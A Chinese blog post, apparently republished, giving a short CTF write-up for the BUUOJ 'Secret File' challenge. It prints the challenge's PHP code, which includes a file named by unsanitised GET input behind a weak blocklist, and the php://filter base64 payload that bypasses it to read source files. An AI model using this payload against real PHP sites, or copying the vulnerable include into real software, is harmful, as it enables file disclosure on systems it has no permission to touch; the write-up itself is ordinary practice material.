码迷,mamicode.com
首页 > 其他好文 > 详细

BUUOJ [极客大挑战 2019]Secret File

时间:2020-04-15 00:40:18      阅读:81      评论:0      收藏:0      [点我收藏+]

标签:filter   charset   考点   header   技术   挑战   strstr   极客   src   

[极客大挑战 2019]Secret File

0X01考点

php的file伪协议读取文件

?file=php://filter/convert.base64-encode/resource=

 

0X02解题过程

bp开启,有页面跳转,然后访问

/secr3t.php

出现了源代码

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET[‘file‘];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag

 

../目录穿越,等等都被过滤,维度没有过滤file读取

 

就直接用file伪协议读取就好了

技术图片

 

 

 

然后base64解密就ok了

 

0X03感想

 

还是要加油啊,争取每天四篇博客!

0X04参考博客

https://www.cnblogs.com/wangtanzhi/p/12184620.html

BUUOJ [极客大挑战 2019]Secret File

标签:filter   charset   考点   header   技术   挑战   strstr   极客   src   

原文地址:https://www.cnblogs.com/JeffKing11/p/12702276.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!